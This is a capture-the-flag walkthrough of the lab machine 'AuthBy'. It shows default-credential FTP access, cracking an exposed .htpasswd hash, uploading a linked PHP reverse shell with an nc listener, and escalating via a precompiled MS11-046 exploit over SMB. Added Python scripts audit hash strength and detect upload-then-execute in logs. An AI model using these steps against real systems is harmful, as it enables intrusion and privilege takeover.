# AuthBy

## nmap

```
mkdir nmap
sudo rustscan -a 192.168.118.46 --ulimit 5000 -- -A -oA nmap/all-ports-service-scan 
```

Ports 21 and 242 are open.

## Enumeration

Visiting the HTTP server on port 242 prompts for HTTP Basic Authentication.

On FTP, logging in as **anonymous** seems to work.

I tried downloading the files but it seems I don't have read permission.

Listing the directories shows a folder called **accounts**.

If I have to guess, these files are the **usernames** allowed to access this server.

Let's try logging in with `admin` as both the username and the password. It works, and there are three interesting files in this account's directory.

First, let's download all of these files on our local machine.

```
wget -r ftp://admin:admin@target-ip-address/
```

One of the files in there is called `.htpasswd`, and it contains a username and a hashed password. The `$apr1$` prefix marks Apache's MD5-based APR1 scheme.

```
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
```

Let's crack this using `john`.
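
As an added example (not part of the original writeup), here is a small audit script that classifies the hash scheme of each `.htpasswd` entry and flags the ones that fall quickly to `john`: the `$apr1$` entry above is MD5-based, which is why it cracks so easily. The extra sample entries are constructed to show how the other schemes are classified.

```python
import re

# Constructed sample .htpasswd content. The first line is the entry found on
# the box; the others are made up to exercise the other scheme checks.
SAMPLE_HTPASSWD = """\
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
# comments and blank lines are ignored

legacy:{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
modern:$2y$10$abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQ
olddes:rqXexS6ZhobKA
"""

DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")  # crypt(3) DES: 8-char password limit


def classify_hash(value):
    """Return (scheme, salt, weak) for one htpasswd password field."""
    if value.startswith("$apr1$"):          # $apr1$<salt>$<hash>: MD5-based, fast to crack
        return "apr1-md5", value.split("$")[2], True
    if value[:4] in ("$2y$", "$2a$", "$2b$"):  # $2y$<cost>$<22-char salt><31-char hash>
        return "bcrypt", value[7:29], False
    if value.startswith("{SHA}"):           # unsalted single SHA-1 round
        return "sha1-unsalted", "", True
    if DES_CRYPT.match(value):              # first two characters are the salt
        return "des-crypt", value[:2], True
    return "plaintext-or-unknown", "", True


def audit_htpasswd(text):
    """Parse htpasswd text into one finding per user entry."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, value = line.split(":", 1)
        scheme, salt, weak = classify_hash(value)
        findings.append({"user": user, "scheme": scheme, "salt": salt, "weak": weak})
    return findings


if __name__ == "__main__":
    # A .htpasswd that is readable over FTP is a finding on its own; the
    # scheme check tells you how fast the exposed hashes will fall.
    for f in audit_htpasswd(SAMPLE_HTPASSWD):
        flag = "WEAK" if f["weak"] else "ok"
        print(f"{flag:4} {f['user']:8} {f['scheme']} salt={f['salt']!r}")
```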

We can also upload to the FTP server. I'm guessing this means the FTP directory is the web root. We can leverage this by uploading a PHP reverse shell via FTP and triggering it by visiting the page with the credentials we cracked using `john`.
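
From the defender's side, the chain described above (write access to the web root over FTP, then execution over HTTP) is easy to spot in logs. The following is an added example, not part of the original writeup: it correlates FTP upload records with web server requests for the same script path. The log lines are constructed and assume a vsftpd-style transfer log and an Apache combined access log written in the same timezone.

```python
import re
from datetime import datetime, timedelta

# Constructed sample logs (not from the box). Formats assumed: vsftpd log
# lines and an Apache combined access log for the site on port 242.
FTP_LOG = """\
Tue Oct 12 10:00:01 2021 [pid 1410] [admin] OK LOGIN: Client "10.10.14.5"
Tue Oct 12 10:00:09 2021 [pid 1412] [admin] OK UPLOAD: Client "10.10.14.5", "/php-rev.php", 5541 bytes, 120.33Kbyte/sec
Tue Oct 12 10:01:40 2021 [pid 1415] [admin] OK UPLOAD: Client "10.10.14.5", "/notes.txt", 80 bytes, 3.10Kbyte/sec
"""
ACCESS_LOG = """\
10.10.14.5 - offsec [12/Oct/2021:10:00:31 +0000] "GET /php-rev.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.5 - offsec [12/Oct/2021:10:01:55 +0000] "GET /notes.txt HTTP/1.1" 200 80 "-" "Mozilla/5.0"
10.10.14.5 - - [12/Oct/2021:10:02:10 +0000] "GET /index.php HTTP/1.1" 401 381 "-" "Mozilla/5.0"
"""

SCRIPT_EXT = (".php", ".phtml", ".phar", ".asp", ".aspx", ".jsp")
UPLOAD_RE = re.compile(r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]+ \d{4}) .*OK UPLOAD: Client "(?P<ip>[^"]+)", "(?P<path>[^"]+)"')
ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')


def parse_uploads(text):
    """Return (time, client ip, path) for each successful upload of a script file."""
    out = []
    for line in text.splitlines():
        m = UPLOAD_RE.match(line)
        if m and m["path"].lower().endswith(SCRIPT_EXT):
            out.append((datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y"), m["ip"], m["path"]))
    return out


def parse_requests(text):
    """Return (time, client ip, http user, path without query) per access log line."""
    out = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
            out.append((ts, m["ip"], m["user"], m["path"].split("?")[0]))
    return out


def find_upload_then_execute(ftp_text, access_text, window=timedelta(minutes=10)):
    """Alert when a script uploaded over FTP is requested over HTTP within the window."""
    alerts, requests = [], parse_requests(access_text)
    for up_ts, up_ip, path in parse_uploads(ftp_text):
        for rq_ts, rq_ip, user, rq_path in requests:
            if rq_path == path and up_ts <= rq_ts <= up_ts + window:
                alerts.append({"path": path, "uploaded_by": up_ip, "requested_by": rq_ip,
                               "http_user": user, "delay_s": int((rq_ts - up_ts).total_seconds())})
    return alerts
```

The underlying fix is to keep the FTP-writable directory out of the web root (or deny script execution there), so that the upload alone cannot become code execution.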

## Exploitation

Create a PHP reverse shell. For this demo, I will use this [one](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php). Copy the source code to your machine; I named it `php-rev.php`.

Edit the IP address and the port at the bottom of the script, setting the port to 242.

Set up a reverse shell listener on port 242.

```
sudo nc -lvnp 242
```

Upload the shell via FTP.

Open your browser and trigger the exploit by requesting the uploaded file. When prompted for Basic Authentication, log in with the credentials cracked above.

```
http://target-ip:242/php-rev.php
```

After that, you should receive your shell right away.

## Privilege Escalation

Since winPEAS is somehow not working, I tried searching for privilege escalation exploits using [**WES-NG**](https://github.com/bitsadmin/wesng).

First, copy the output of `systeminfo` to our local machine as `systeminfo.txt`.

Then run the following to list candidate privilege escalation exploits.

```
sudo python3 wes.py systeminfo.txt -i "Elevation of Privilege"
```

After some time, I found this promising-looking exploit.

I have found a pre-compiled executable of this exploit [here](https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS11-046/ms11-046.exe). Download a copy to your local machine.

Start an SMB server on your machine.

```
sudo python /opt/impacket/examples/smbserver.py kali . -smb2support
```

Transfer the privilege escalation exploit.

After running the exploit, you should instantly get a **SYSTEM** shell.

Thanks and enjoy the rest of your day!
